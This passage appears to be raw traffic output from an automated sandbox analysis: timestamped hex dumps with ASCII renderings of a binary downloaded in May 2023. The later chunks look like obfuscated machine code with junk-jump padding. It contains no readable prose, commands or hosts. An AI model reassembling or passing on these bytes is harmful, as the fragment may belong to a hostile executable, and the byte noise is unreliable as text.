4f ca ff 17 ac 4e 24 62 17 3e 48 83 fd 46 65 46 81 f3 6d 69 13 a6 66
                            Data Ascii: tRH/!36E::TGO6|y631!%xT>)WR-FeW[KbxQ5#lu9v`eT:4y|(RG+?GSc9Q>-Lw|tu7ZYo?PI7^O$j7xZ08DS{nW.XnON$b>HFeFmif
                            2023-05-14 02:49:54 UTC1168INData Raw: 78 f3 04 9f e2 f2 98 5d 1e a6 74 5f c5 84 f4 a6 57 95 b5 bb a4 e4 e2 14 b9 89 dc c3 2d 29 0b db a7 9c e2 4f c2 85 b3 1d 25 1f 74 42 03 06 5d a4 86 16 d9 21 69 e1 02 d8 3d b3 7d 48 7e fa 42 53 4d 5e 7c bb 05 ae af 69 16 07 a1 72 96 60 20 09 e4 a7 31 e7 91 9e 77 d0 9c dd ee 48 23 e4 48 41 62 9e 82 78 a2 02 9a 6c 11 dc 39 ba c8 18 76 34 d8 87 56 7e 42 b8 91 92 b5 21 e9 2a 60 d1 8c eb 7f ae 6b fe cf 62 bc 2b f4 69 30 18 b3 b3 e8 9a a6 e7 0b 1c 73 3f e5 89 cf 6a 06 32 f3 f1 44 9e e0 ec 95 98 32 af bb 3d 7a c1 4f 37 f5 f3 73 f9 bd a9 93 2d 71 37 f5 df f0 02 c6 ee eb e1 8c 04 e5 ad fa 7c 28 b1 b3 0f c4 d1 91 67 55 2b 73 c7 05 67 d2 46 d7 b1 11 12 8a c0 ac 94 a3 83 6c eb fd 3e f9 a8 5b 51 64 21 b6 e0 79 1a 8c f5 69 f1 fe 33 1c c7 7c 87 65 22 4a 30 2e c6 f6 e1 c8
                            Data Ascii: x]t_W-)O%tB]!i=}H~BSM^|ir` 1wH#HAbxl9v4V~B!*`kb+i0s?j2D2=zO7s-q7|(gU+sgFl>[Qd!yi3|e"J0.
                            2023-05-14 02:49:54 UTC1184INData Raw: e8 ea 5a 6c c2 b8 08 34 95 2b f0 82 1a 47 2b 10 72 fd 1e 80 68 de 43 17 17 8f 5f 6e d8 7b 56 c7 ca 28 5d 10 16 aa be 78 a3 9b 7f df d5 d7 1a 7f da f5 55 3b 29 94 94 fb 75 13 f5 1c 65 95 c3 67 f8 c5 d8 7d 48 5e 73 5e a4 14 68 71 dd f7 46 04 c6 96 cd b1 71 c1 2d 76 a5 28 98 cb a3 d4 e3 da b5 5b e9 e9 c8 f9 bd 55 0a a3 b0 c2 e2 59 60 35 d5 fe 5b 50 40 08 e0 0f 66 7e c4 8e bf d2 dd 6e 3d ff f7 23 20 9e c3 ce 70 1c 67 57 a9 b3 33 89 6f 25 9d d2 67 33 2f 52 e4 81 c7 e0 c1 b2 d4 42 54 af 7c ba e7 20 b9 32 ea fd a8 bb 93 14 ca ad 9f c3 43 65 a2 57 61 06 c4 0c 1c fb 78 a7 eb 55 d3 b8 a3 b4 ba d0 03 1e e2 6f 47 a1 7f c7 e8 4a 32 69 fd 34 50 bd 2c db 0a d9 36 04 e1 75 54 a4 64 99 f8 38 42 b4 71 ab e7 5a 5f 19 bf 63 66 a7 b1 6a 48 52 91 17 65 18 bf aa 1b 47 61 22 98
                            Data Ascii: Zl4+G+rhC_n{V(]xU;)ueg}H^s^hqFq-v([UY`5[P@f~n=# pgW3o%g3/RBT| 2CeWaxUoGJ2i4P,6uTd8BqZ_cfjHReGa"
                            2023-05-14 02:49:54 UTC1200INData Raw: f9 cc f4 6e ca 92 15 11 af 6c fa 43 31 56 a1 4a 52 fc 33 6e b5 ea 15 5a ad 02 ac f6 f7 65 0a e9 ce c8 ca 79 da cb 55 e4 34 99 9d 16 2e 47 1b 47 f5 ab 77 75 40 32 75 16 e4 2f ce a5 9a e1 59 a7 1e 08 78 70 81 45 ff 47 84 df 62 5d 9b 97 64 a4 31 e1 c8 f9 f6 de 51 74 d0 6a 6b 85 d2 f9 ef e2 4c b0 7e 4c 8f 42 02 74 2d bf d8 66 b4 77 fa 7e bd 8f fa 45 00 d4 15 55 9a 5a 2c 28 be 78 f1 f1 a5 5e e8 eb 65 8c 2a 5e 53 3b ad 72 56 21 e8 ec bd b6 58 54 d8 ee c6 fe bc 92 0f ad 15 ff 9a 88 fd 47 c8 15 a1 f7 3e 52 56 97 64 e3 15 5c 60 b7 d7 31 5a fe c2 7e 68 96 9c 09 7e f8 2d 79 c0 d1 4a e6 c3 f3 60 fa 72 49 ec d7 9e 76 25 d7 8b 2e 0f 9d 59 47 b0 6b e5 d3 b9 10 2a 34 e4 49 da 10 e1 ec 9e 19 f7 d6 be 4d 06 59 40 3e 5d 61 30 a0 58 a4 86 cf cd d6 03 96 ed 32 a0 f3 0b e9 87
                            Data Ascii: nlC1VJR3nZeyU4.GGwu@2u/YxpEGb]d1QtjkL~LBt-fw~EUZ,(x^e*^S;rV!XTG>RVd\`1Z~h~-yJ`rIv%.YGk*4IMY@>]a0X2
                            2023-05-14 02:49:54 UTC1216INData Raw: 31 c2 c9 09 22 60 bb d7 a4 77 45 43 f4 26 71 bc d8 50 9b af 08 98 31 d1 f8 15 cb a6 99 99 20 30 f9 59 e4 76 a8 92 66 4d f5 9d 7e 46 ad 33 06 18 ef a6 73 41 7d d3 47 d2 29 62 28 6f f7 47 d8 ba 45 46 f8 2b a6 a6 6e 77 28 e1 e1 9b e4 73 56 4c f5 cb 5b f3 d0 1e 22 17 27 10 ff d4 41 00 c2 92 39 d3 b0 64 a2 02 1b 1c b1 dc 71 7f e0 37 82 48 5b 15 df 08 38 88 21 92 d4 d0 e0 dd fa f1 ae 90 0c ce 79 d1 68 b2 86 18 5a a9 49 dc 17 fd 74 e8 ea b7 1b 49 b1 dd 22 1f e6 82 05 c6 93 40 c3 f1 60 c0 58 12 a2 e0 eb 1b 1c de 74 7b df 77 13 ca 5e 2c c6 6b 66 65 a1 d2 ae d1 c0 a9 f8 b1 48 80 bd c2 78 f9 82 b6 87 71 46 4d bc 89 a5 70 7a 60 55 57 3b c5 f7 56 5b 1e b8 5e 9e 5a 3b e4 c0 36 67 4c c0 38 62 f2 f4 50 96 c3 61 63 85 f7 20 2b dd a0 dd c5 fa dd a2 4e fc 0a 4a 84 ff 21 d6
                            Data Ascii: 1"`wEC&qP1 0YvfM~F3sA}G)b(oGEF+nw(sVL["'A9dq7H[8!yhZItI"@`Xt{w^,kfeHxqFMpz`UW;V[^Z;6gL8bPac +NJ!
                            2023-05-14 02:49:54 UTC1232INData Raw: b5 8f ba fd 35 8e d6 50 64 7f 7b 5b 67 1f 58 a8 df 9b ca e4 7b dc 63 8f 35 36 0e 8e 76 e1 48 92 1b 9f e9 20 23 82 11 5a 96 ba 79 1b 34 ab 73 40 bf bd f7 16 a0 8c b6 d3 f1 93 15 a8 25 b2 3a 54 bc cf 71 0c b3 8a 12 49 9e 92 7c 5b a5 b7 26 a8 df 07 1d a1 5b ff 65 3a d5 88 32 7f b5 66 da f8 7d de d4 c8 92 4c 33 5d b6 c4 49 db f6 57 d0 40 e6 a3 99 e7 d1 8d 61 96 fc 21 0e e3 bb 81 81 10 f4 dd c2 4e c2 17 9a d8 b3 99 50 59 b7 7f 6a 28 99 67 db 51 38 6c 61 3c be da 2e b5 ed e3 1c 70 ad 96 ac bb e5 3f 02 42 ba 0b 30 99 13 19 61 f5 7f 2c ff 01 81 ce 40 91 a4 f2 ee 4e b2 e1 c9 90 ba 10 bc 0e 59 7b f7 9a b6 c8 22 57 cb 34 3c a9 37 a5 cf 79 21 dd 81 3a ad 2e fa 46 f0 ef ca 00 f8 dc 1a fb f1 22 70 0b 36 99 0d 7b b5 97 4b 8e 1f f7 fa 25 30 c8 89 15 27 19 8a 96 33 e1 c2
                            Data Ascii: 5Pd{[gX{c56vH #Zy4s@%:TqI|[&[e:2f}L3]IW@a!NPYj(gQ8la<.p?B0a,@NY{"W4<7y!:.F"p6{K%0'3
                            2023-05-14 02:49:54 UTC1248INData Raw: 7d a6 f3 7c e2 fd 92 5d 38 da 78 1b ac 7f f2 78 9f a7 1b 63 72 9d 56 02 fd d4 6f ae 63 ef c6 90 05 fe f8 ae e1 a3 d2 42 3e 59 78 1d 34 7d 76 aa 9f 84 cb 65 56 5c 61 92 f4 16 ee e1 d3 e1 56 92 7c be ed 70 e2 13 f2 5d f6 dc 7b 9b 9a 67 72 21 5e a7 6b 69 74 5d 09 32 fd 4e ed af 33 fa ca 90 98 9e f8 2c e5 a0 f2 61 26 d9 96 da b5 97 7d ac 1f 25 78 65 75 df 60 72 ef 1a ee 34 b3 e1 3e 94 7f 9e d1 68 e2 f5 33 5d 16 d2 7d db ee 57 72 5c dd a6 8b 7d 78 dd a8 52 fd 6e e8 ac 33 d4 d2 90 c7 5f f8 38 ec a6 32 28 16 d9 b5 58 b4 67 6d a0 df 58 9b 65 44 9d 6b 42 dd 02 ee 89 72 e1 72 99 79 5e a8 58 e2 02 b0 5c d6 cc 71 5b 02 37 72 44 da a5 9b 54 60 dd f7 93 fd 02 e3 aa f3 8d e2 90 01 dd f9 e8 fe aa b2 b6 76 d9 fd 5c b7 b7 4f b8 df 5a 5a 65 20 4d 75 8a b0 32 ee e2 f1 e0 92
                            Data Ascii: }|]8xxcrVocB>Yx4}veV\aV|p]{gr!^kit]2N3,a&}%xeu`r4>h3]}Wr\}xRn3_82(XgmXeDkBrry^X\q[7rDT`v\OZZe Mu2
                            2023-05-14 02:49:54 UTC1264INData Raw: 93 f1 45 f4 2f 8e 0c d1 64 74 c7 db 7f 7b f7 34 11 23 e5 e8 be e1 5e 9e 33 96 11 22 7d c3 35 0c a3 72 76 f6 24 8c a5 db 38 d5 e6 d7 c4 da cd 44 1e 87 64 99 fe f1 fe 8e 13 3e d1 1c 0d 4d fc 1c 87 f4 45 74 af 12 84 53 f8 55 ff 97 6b 83 79 ad 93 8b 70 a8 fe f1 de cf 53 3e f1 20 3f ed 5f 1d b2 f2 13 75 2d 0e 04 d9 b8 fd c3 d3 7b db c0 22 01 9b 64 22 fe f1 6e 9b 35 0e 41 22 35 c6 75 1c 73 f9 4b 94 0c 8e 2f 50 f8 75 ca db 1b 7b cd 15 90 8b 44 e4 b2 f1 8e de 33 30 52 23 fd d6 65 dc f3 f2 59 f7 2d 0e 11 c9 38 b5 c6 b7 4a 7b cd a4 2a bb e4 68 be 1d d9 9c 33 00 61 a2 bc cd 5d 74 f3 f2 47 74 95 ce 08 d3 fa 45 00 f6 eb da 0d 24 d1 8e 60 69 82 e1 de be b2 3f 5d 26 fd f0 6d 1c 9f 73 46 f8 28 ee c0 d2 fa f5 46 d5 78 43 c5 a4 4e ab 64 41 bc f2 c6 96 f3 54 71 22 f5 cf 7e
                            Data Ascii: E/dt{4#^3"}5rv$8Dd>MEtSUkypS> ?_u-{"d"n5A"5usK/Pu{D30R#eY-8J{*h3a]tGtE$`i?]&msF(FxCNdATq"~
                            2023-05-14 02:49:54 UTC1280INData Raw: 07 d2 57 f6 6c 8f 0c c9 f7 f1 c6 b7 1b 52 05 27 13 eb 44 d5 1e 7f de 97 13 3a 55 42 e8 b5 5d 0f b2 e0 27 f9 24 4e a2 23 f8 e7 c4 f3 7b 47 dd a4 78 6c e5 a9 ba b9 5e a4 13 3e 37 f6 3e 89 74 f8 b3 a8 07 f4 f2 3e 0a e7 c8 7d 84 97 7b b9 74 23 55 9a 44 e8 44 71 de 5e b9 31 6d 02 7d 4f fc 1c 2b 52 48 94 4a de 87 51 f8 89 74 d8 d3 78 ed 25 b1 8a 65 09 2c ee 96 de b3 3a 52 23 7d 7b 62 64 75 72 43 f4 04 8e 4d f4 78 f7 c6 5f 7a 49 c1 20 11 b6 74 e9 5a f0 cc 92 37 3e da 22 38 cd 15 1e 97 ea 4f f4 5f ae 0d 59 fa e7 de df 7b c2 cc 2e 11 7b 63 a1 8e e1 de 72 73 3e 61 24 75 fd 6d 1c ab f6 53 f4 0c 82 9d b1 d8 f5 6a 56 7b 5b 0f 49 b3 ab 64 ed b4 d9 de 5e 25 1e 50 30 3b d9 7d 1c bf f6 47 90 4c 8d 0e d0 18 fb c2 d7 00 3b ce 27 10 4b 15 a9 bf f1 40 5e 35 38 53 a2 24 c5 7d
                            Data Ascii: WlR'D:UB]'$N#{Gxl^>7>t>}{t#UDDq^1m}O+RHJQtx%e,:R#}{bdurCMx_zI tZ7>"8O_Y{.{crs>a$umSjV{[Id^%P0;}GL;'K@^58S$}
                            2023-05-14 02:49:54 UTC1296INData Raw: a1 b9 49 49 46 e4 33 b3 99 1e 2a e8 12 f4 c5 59 d8 d3 7a 96 5e 1b d0 49 51 51 df d4 78 ae 73 1f de 9b 69 a9 55 e5 00 2f 91 36 4f bd 72 70 e3 5b e2 e3 6b 06 cc 92 50 33 1a 55 57 8f d6 a6 b3 3d fa 99 93 89 44 15 16 a6 11 36 88 a8 1e 35 c1 fb 5e f0 6a b1 56 9a 18 41 2f 24 1e 52 54 9b 73 97 da 49 4a cb 4a e5 3e ae 65 9e 18 ab 52 3f c3 66 78 14 6a 46 d4 da df e1 67 55 e3 5d a4 a7 73 17 e8 81 76 4c d4 fd 3c ed ff d9 1e 58 df dd 15 cb e2 01 bc 66 3b dd 06 82 39 38 91 ad 72 ef 65 0b c1 57 98 4d c9 8a 75 f2 4f a9 36 9b 78 03 12 2a b7 8f aa 0a d6 e5 09 ee bf b2 a2 a5 95 a1 2a d2 45 60 86 3a ba 2a d5 57 4c 20 cc 49 db 7f f5 ae 0a d1 9b 82 16 ad 24 7d 5f 22 c2 05 3b e4 1c 76 4c bc 1f 08 bd 92 4d ec 49 f3 93 7f f3 9c 1f 9b e7 65 f5 b7 89 a9 b8 b0 95 5a 4e b7 af 61 d1
                            Data Ascii: IIF3*Yz^IQQxsiU/6Orp[kP3UW=D65^jVA/$RTsIJJ>eR?fxjFgU]svL<Xf;98reWMuO6x**E`:*WL I$}_";vLMIeZNa
                            2023-05-14 02:49:54 UTC1312INData Raw: 71 5f a6 46 2a a3 41 2c 2e d5 4a 53 d9 b5 17 3e c4 3a 7d 0e 1a 49 e0 ed 35 38 95 e7 88 e0 42 5b 09 0b 6e 74 8b 82 ed 5b 7e 36 4e d5 ee 71 5d bb b8 99 b9 55 08 ae 08 81 6c b5 0c f2 20 87 b4 f6 3e d6 08 94 fb fa c7 46 1d 59 96 4f 70 61 b6 fb 76 29 b8 4f db d1 d4 1e 7d e0 8a 35 50 de 06 0b 2b 81 86 fd a4 85 bc 39 4e 61 2e d9 13 da 2e ab 3d e1 91 5e 48 ab 8c 3a be 47 0b 38 a6 6c 75 82 9e e0 39 7f 0d aa 28 a2 52 a4 ee 7f 12 59 2c a8 bf 5e 34 4c d8 5e 03 33 26 46 8d 30 18 32 63 38 29 b8 a7 38 bf f4 f3 8d ac c1 8a 02 02 e2 b9 4b ad 0b fd 17 84 20 a0 f5 b7 90 65 d4 8e b1 35 62 3b ef df 54 a8 4b 95 ff 38 b7 48 b2 df 42 c1 d3 f8 b8 34 25 13 aa 16 bd d9 f2 d2 c9 d2 d4 05 b9 0d c2 2e 39 bb f0 2b de 78 c3 1a dd a4 48 43 6b b5 b1 47 87 ca 04 85 19 54 b0 98 cc 70 fb f5
                            Data Ascii: q_F*A,.JS>:}I58B[nt[~6Nq]Ul >FYOpav)O}5P+9Na..=^H:G8lu9(RY,^4L^3&F02c8)8K e5b;TK8HB4%.9+xHCkGTp
                            2023-05-14 02:49:54 UTC1328INData Raw: 91 d7 01 49 fa aa a9 1e 8a 37 d6 e2 dd 62 9d 67 07 c2 29 62 3f f7 f4 cf 77 18 9d 90 ef ab 3c 95 e3 cb 06 bc ee 78 58 c4 ef cd a2 9a 1b 1c cd cb 1d a4 84 27 8c 89 c6 4b 03 07 39 c8 b7 fc 9a 3b c8 48 92 9f dc bc 01 46 4f d9 2b 1a 52 dd 48 ae f3 6c 3e ea 01 cf 0e 5a ab a2 07 1d 75 e1 98 93 be 2d d1 41 82 83 eb 43 06 a1 dc 02 6a fc 15 a7 a1 20 87 6d 2c ce 80 90 95 d4 0f 70 da d4 27 9d 16 a3 ae f1 c5 b5 03 5c 80 fc 61 b7 55 70 64 cb a4 5b aa 22 9f 9d 33 0b 81 7e ca 38 33 71 ba c2 77 5f 1e 44 a5 b6 49 88 51 b1 e8 d3 f2 c7 05 cc b1 06 2f 25 5a c4 23 b4 24 3b 81 1c b2 b4 64 92 4f 7a 23 6f 51 54 b6 90 c0 db 60 ae 1f 2f 0b 02 02 93 b4 ba 96 01 46 7a e4 94 02 d6 5c 69 04 0b 24 3e 97 43 54 90 d6 46 74 ce 53 85 c9 48 82 4d ad ff 8e c7 d9 d8 10 99 d0 a8 11 bd 7d 23 4a
                            Data Ascii: I7bg)b?w<xX'K9;HFO+RHl>Zu-ACj m,p'\aUpd["3~83qw_DIQ/%Z#$;dOz#oQT`/Fz\i$>CTFtSHM}#J
                            2023-05-14 02:49:54 UTC1344INData Raw: 52 6b bf a2 a0 8e 17 e4 5d 65 80 a1 7c 24 b5 7c 29 fe 7c ee 14 58 c5 54 94 b9 9e f5 d8 2c ff b0 b2 d4 2a a6 4e 91 d9 7f b8 5d 8a c4 dd a9 21 32 24 53 0d 4e 4f 84 05 b1 32 80 09 24 8a e8 9f 96 43 3e 57 8b 6d 89 b0 37 f6 0f 6b fa 18 21 91 71 c5 a7 f0 16 29 9b ea e1 b7 5f d2 cd 29 db 51 b2 85 36 ce 71 ea db 7e dd 46 15 1f 32 e0 bf d8 82 c5 e0 64 d8 32 13 a3 59 ef 05 6c 70 4c 28 ab 95 9b ee 8c 8d bc 2d 8c 7e e6 29 67 16 fd 3e 14 e5 86 8b c5 2f 10 1f c3 2b 94 f6 29 34 22 04 48 38 5a 5a 3c 64 d0 aa e7 7a 89 66 77 ad 98 cd 95 4d d0 69 3c 28 ec 05 0d a8 36 9b 6e f5 95 27 81 8f e6 fb 58 7b 87 88 1b 48 e9 63 36 34 9e 76 08 27 ab fe c5 57 5d dd ae b0 85 10 95 4d 9f af ec 00 1a 3a ed b9 4b 20 b3 8d e1 8f 56 93 35 a6 10 ad e8 9a dc 4b 92 14 1f 01 bb da 9a 09 2d 5e 94
                            Data Ascii: Rk]e|$|)|XT,*N]!2$SNO2$C>Wm7k!q)_)Q6q~F2d2YlpL(-~)g>/+)4"H8ZZ<dzfwMi<(6n'X{Hc64v'W]M:K V5K-^
                            2023-05-14 02:49:54 UTC1360INData Raw: b1 b5 8a 02 19 b2 53 1e 6e ae 8c 74 94 77 3f 7d ac af 9f 8e ca ec 67 48 d8 23 07 30 b9 f9 ba 40 04 0c cf 73 69 6f 96 f2 a5 eb 3f bc 94 e0 76 3d 4e 04 a9 00 6f 3f 76 56 5e 98 54 99 94 c5 16 35 d2 4c cc ba 88 8e 64 35 eb 73 5d e2 77 56 27 b3 5d f7 70 f6 09 a5 1c 30 6a 48 ae ed 94 c8 9c 94 d5 5f 5d 59 8d 7d f9 eb be dd 46 92 6c 7a 03 54 74 89 26 fb 22 d0 3e b8 d3 01 6a 59 94 90 ba 0c 81 f1 b7 93 54 b3 ec 5a 74 04 4f 75 f3 2f 30 07 87 2f 26 a6 7a cb c2 bd ed 37 2b 51 95 e9 a1 05 26 9f 1e 29 88 66 e5 ac 64 57 0f 9e d6 67 21 b5 1e 9b 34 c0 61 58 15 a2 85 21 85 9c c3 96 85 5a bd cf 52 65 45 59 c9 2b 50 f9 5c ea 63 2b ed 28 d1 76 c2 37 11 bd 42 95 72 73 da 3e b7 16 3b 51 ed 3f 71 27 0e b2 9a 62 d3 4f ac 1d 0f cf 7b 0a f8 8f ed d0 74 4b bc 59 e5 14 a1 96 86 cb 61
                            Data Ascii: Sntw?}gH#0@sio?v=No?vV^T5Ld5s]wV']p0jH_]Y}FlzTt&">jYTZtOu/0/&z7+Q&)fdWg!4aX!ZReEY+P\c+(v7Brs>;Q?q'bO{tKYa
                            2023-05-14 02:49:54 UTC1376INData Raw: 03 7c 8d ef 75 87 61 fa 3b 7a c2 d6 1d 3d 59 83 03 77 66 0f 28 1e bd 07 c5 39 11 40 ca d6 e5 1e 81 12 97 7c cf 43 54 d2 8c 64 c6 f8 29 11 2a 2e d8 d5 37 0b fd fc 6f 10 54 b3 95 9d 6f a6 5d 62 f3 6e 4e 3b 78 d0 cd 92 8a 78 0d 7c 9a 1f ad 2f e2 44 a0 e8 d8 94 c6 5d 67 33 99 2c 6d 94 31 47 81 7e ea ff 55 a9 ce ba ba a3 46 5f d1 16 11 93 65 36 c4 b1 cc b8 87 97 65 cb 85 69 0e 25 bd 1c e7 ba e7 af 45 83 4e 03 62 1a 24 55 03 96 4b 6e 79 c3 ce f6 a0 2c 05 35 cc 71 9e 99 4d c0 dd 02 c2 00 87 f5 fa c1 95 5a a3 b8 05 97 08 0c 01 26 83 e6 ec 62 cb 83 1c d5 68 7b 34 69 db 02 ec 1d 89 96 af 5a 9e 57 4f 89 80 e8 ef 94 05 32 0d 0f 78 02 a1 ca 10 3c 14 b5 46 26 91 12 ff 82 55 d6 d4 7f 88 4f 5e 81 5d df ba ba 2b 5c 1b 7a 0c 33 c2 db 21 c6 d8 4e 5a 94 bd 33 9b 09 65 9d 9d
                            Data Ascii: |ua;z=Ywf(9@|CTd)*.7oTo]bnN;xx|/D]g3,m1G~UF_e6ei%ENb$UKny,5qMZ&bh{4iZWO2x<F&UO^]+\z3!NZ3e
                            2023-05-14 02:49:54 UTC1392INData Raw: 00 dd 07 02 00 98 45 13 00 70 08 02 00 b5 08 02 00 d0 45 13 00 b5 08 02 00 12 09 02 00 dc 45 13 00 12 09 02 00 1c 09 02 00 f0 45 13 00 30 09 02 00 1c 0a 02 00 20 46 13 00 90 0a 02 00 6b 0b 02 00 74 46 13 00 6b 0b 02 00 4f 0e 02 00 88 46 13 00 4f 0e 02 00 a9 0e 02 00 a4 46 13 00 b0 0e 02 00 e9 0e 02 00 6c 46 13 00 f0 0e 02 00 27 0f 02 00 d4 46 13 00 00 13 02 00 0d 14 02 00 00 46 13 00 b0 15 02 00 bf 16 02 00 10 46 13 00 c0 16 02 00 16 1a 02 00 38 46 13 00 20 1a 02 00 64 1d 02 00 b4 46 13 00 70 1d 02 00 a5 20 02 00 54 46 13 00 60 21 02 00 23 22 02 00 fc 46 13 00 10 24 02 00 2a 26 02 00 ec 47 13 00 30 26 02 00 b9 26 02 00 80 47 13 00 c0 26 02 00 4a 27 02 00 ac 47 13 00 50 27 02 00 84 27 02 00 88 47 13 00 90 27 02 00 b0 29 02 00 b8 47 13 00 b0 29 02 00 f0 29
                            Data Ascii: EpEEE0 FktFkOFOFlF'FFF8F dFp TF`!#"F$*&G0&&G&J'GP''G')G))
                            2023-05-14 02:49:54 UTC1408INData Raw: 00 c4 a4 13 00 f0 9e 06 00 35 a0 06 00 6c a3 13 00 40 a0 06 00 b3 a2 06 00 2c a5 13 00 c0 a2 06 00 7e a5 06 00 58 a5 13 00 80 a5 06 00 d4 a8 06 00 2c a4 13 00 e0 a8 06 00 a6 ac 06 00 54 a3 13 00 b0 ac 06 00 24 ae 06 00 20 a4 13 00 30 ae 06 00 52 ae 06 00 48 a4 13 00 52 ae 06 00 29 af 06 00 54 a4 13 00 29 af 06 00 34 af 06 00 68 a4 13 00 34 af 06 00 42 af 06 00 78 a4 13 00 50 af 06 00 8d af 06 00 98 a5 13 00 8d af 06 00 c1 b2 06 00 b0 a5 13 00 c1 b2 06 00 dc b2 06 00 d0 a5 13 00 dc b2 06 00 07 b3 06 00 e0 a5 13 00 40 b3 06 00 b8 b3 06 00 00 a6 13 00 c0 b3 06 00 dd b3 06 00 80 a3 13 00 dd b3 06 00 14 b4 06 00 8c a3 13 00 14 b4 06 00 1f b4 06 00 a0 a3 13 00 1f b4 06 00 2a b4 06 00 b0 a3 13 00 30 b4 06 00 ca b7 06 00 e0 a0 13 00 d0 b7 06 00 4c bb 06 00 08 a5
                            Data Ascii: 5l@,~X,T$ 0RHR)T)4h4BxP@*0L
                            2023-05-14 02:49:54 UTC1424INData Raw: 00 60 d3 0b 00 32 d4 0b 00 9c e8 13 00 32 d4 0b 00 b0 d4 0b 00 b4 e8 13 00 b0 d4 0b 00 db d4 0b 00 c8 e8 13 00 0c d5 0b 00 92 d5 0b 00 4c ea 13 00 d0 d5 0b 00 45 d6 0b 00 88 ed 13 00 b0 d6 0b 00 f1 d6 0b 00 d0 f0 13 00 f4 d6 0b 00 3a d7 0b 00 50 f0 13 00 ac d7 0b 00 ca d7 0b 00 24 ec 13 00 cc d7 0b 00 f1 d7 0b 00 24 ed 13 00 34 d8 0b 00 5a d8 0b 00 2c ec 13 00 5c d8 0b 00 82 d8 0b 00 2c ed 13 00 84 d8 0b 00 b0 d8 0b 00 c0 f0 13 00 b0 d8 0b 00 dc d8 0b 00 3c f0 13 00 dc d8 0b 00 08 d9 0b 00 cc ef 13 00 08 d9 0b 00 34 d9 0b 00 5c ef 13 00 34 d9 0b 00 60 d9 0b 00 14 ec 13 00 60 d9 0b 00 85 d9 0b 00 14 ed 13 00 88 d9 0b 00 b6 d9 0b 00 e8 ed 13 00 b8 d9 0b 00 e6 d9 0b 00 78 ee 13 00 b0 db 0b 00 41 dc 0b 00 d8 eb 13 00 5c dc 0b 00 f2 dc 0b 00 3c ee 13 00 f4 dc
                            Data Ascii: `22LE:P$$4Z,\,<4\4``xA\<
                            2023-05-14 02:49:54 UTC1440INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:
                            2023-05-14 02:49:54 UTC1456INData Raw: f8 73 05 4b ae ed 48 49 48 ff c4 f8 eb 06 b7 2a 1a 11 d5 e9 73 04 64 13 1f 3b e9 05 00 00 00 b1 ec 28 38 91 eb 06 87 31 30 81 d4 3e 9e 48 8b 04 24 eb 04 4e 1f c1 52 48 8d 64 24 08 e9 05 00 00 00 9a 16 25 f3 c3 e9 02 00 00 00 89 6a 66 8b 1c cc 48 ff c7 48 8b cc e9 02 00 00 00 50 e6 9c f8 eb 06 94 55 47 58 18 da 73 04 7c 35 77 35 e8 07 00 00 00 2e ef 55 8e 40 25 91 48 83 c4 08 9d eb 02 7c 30 48 81 c1 f0 00 00 00 48 8b 09 51 e9 02 00 00 00 51 67 9c f9 e9 02 00 00 00 fa f5 72 05 c5 8c e4 ff 83 e8 06 00 00 00 50 ae 25 7f 98 45 48 83 c4 08 e9 07 00 00 00 5c bf 13 51 74 52 bb 9d eb 06 8c ac c7 48 3d ab 9d 48 23 c3 9c 50 9f eb 06 ad ad 44 21 a3 7e 38 d2 e9 04 00 00 00 a6 25 da 64 74 03 e8 ce 80 e8 02 00 00 00 9d 8c 48 83 04 24 0a c3 7e 4a 9e 58 e9 05 00 00 00 cb
                            Data Ascii: sKHIH*sd;(810>H$NRHd$%jfHHPUGXs|5w5.U@%H|0HHQQgrP%EH\QtRH=H#PD!~8%dtH$~JX
                            2023-05-14 02:49:54 UTC1472INData Raw: 00 00 00 28 dc 43 ba df 26 e9 94 c7 00 00 e9 03 ce 00 00 e9 97 ec 00 00 eb 03 cd ac 6d 9c f8 e9 02 00 00 00 dd 54 73 04 3b 3d cf 79 e8 06 00 00 00 94 58 5f 73 c3 bd 48 ff c4 f9 eb 07 36 b8 95 1d d6 27 8f 72 05 6e ba 4d e8 c3 48 ff c4 eb 06 4f 95 23 ee a7 c0 48 ff c4 f8 e9 04 00 00 00 82 30 c9 a7 73 03 a5 ef b2 48 ff c4 f9 eb 03 64 f3 fe 72 03 ab 5b 5c 48 ff c4 f8 73 02 dd a0 48 ff c4 eb 07 8d 52 69 52 d6 ce 8c 48 ff c4 eb 06 9c c2 4d f1 60 5c 48 ff c4 38 c9 eb 05 8f a4 28 39 5d 74 02 c8 f8 eb 05 fa da 31 de cb 9d e9 03 00 00 00 22 1f b7 e9 90 03 01 00 e9 ec 1b 01 00 48 8d 64 24 f8 e9 06 00 00 00 43 e1 f7 5b 87 4f 48 89 04 24 9f eb 03 b6 ad 63 eb 02 39 1f e8 05 00 00 00 83 f3 9b c2 a0 48 8d 64 24 08 9e 58 eb 02 90 8c e9 00 00 00 00 e9 00 00 00 00 9c 48 8d
                            Data Ascii: (C&mTs;=yX_sH6'rnMHO#H0sHdr[\HsHRiRHM`\H8(9]t1"Hd$C[OH$c9Hd$XH
